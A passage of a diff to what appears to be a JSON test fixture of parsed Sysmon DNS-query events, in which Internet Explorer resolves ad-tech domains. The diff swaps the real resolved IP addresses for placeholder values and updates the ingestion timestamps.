track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12329,12 +12193,12 @@ }, "answers": [ { - "data": "37.18.16.16", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "37.18.16.16" + "89.160.20.156" ] }, "network": { @@ -12349,13 +12213,13 @@ "dm.hybrid.ai" ], "ip": [ - "37.18.16.16" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742077900Z", + "ingested": "2021-12-09T13:50:23.457291900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:37.18.16.16;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12419,11 +12283,11 @@ "type": "CNAME" }, { - "data": "199.166.0.32", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12431,7 +12295,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -12439,7 +12303,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12447,7 +12311,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -12455,21 +12319,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "199.166.0.32", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -12485,22 +12349,22 @@ "static.adsafeprotected.com" ], "ip": [ - "199.166.0.32", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742084900Z", + "ingested": "2021-12-09T13:50:23.457297700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12564,27 +12428,27 @@ "type": "CNAME" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -12600,16 +12464,13 @@ "trc.taboola.com" ], "ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742094200Z", + "ingested": "2021-12-09T13:50:23.457305700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12668,12 +12529,12 @@ }, "answers": [ { - "data": "107.178.254.65", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "107.178.254.65" + "89.160.20.156" ] }, "network": { @@ -12688,13 +12549,13 @@ "pippio.com" ], "ip": [ - "107.178.254.65" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742102700Z", + "ingested": "2021-12-09T13:50:23.457311700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:107.178.254.65;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12758,11 +12619,11 @@ "type": "CNAME" }, { - "data": "209.15.36.34", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12770,7 +12631,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -12778,7 +12639,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12786,7 +12647,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -12794,21 +12655,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "209.15.36.34", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -12824,22 +12685,22 @@ "pixel-sync.sitescout.com" ], "ip": [ - "209.15.36.34", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742108800Z", + "ingested": "2021-12-09T13:50:23.457317500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12899,11 +12760,11 @@ }, "answers": [ { - "data": "35.186.202.217", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12911,7 +12772,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -12919,7 +12780,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12927,7 +12788,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -12935,7 +12796,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -12944,16 +12805,16 @@ } ], "resolved_ip": [ - "35.186.202.217", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -12969,23 +12830,23 @@ "prod.y-medialink.com" ], "ip": [ - "35.186.202.217", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742112600Z", + "ingested": "2021-12-09T13:50:23.457323200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 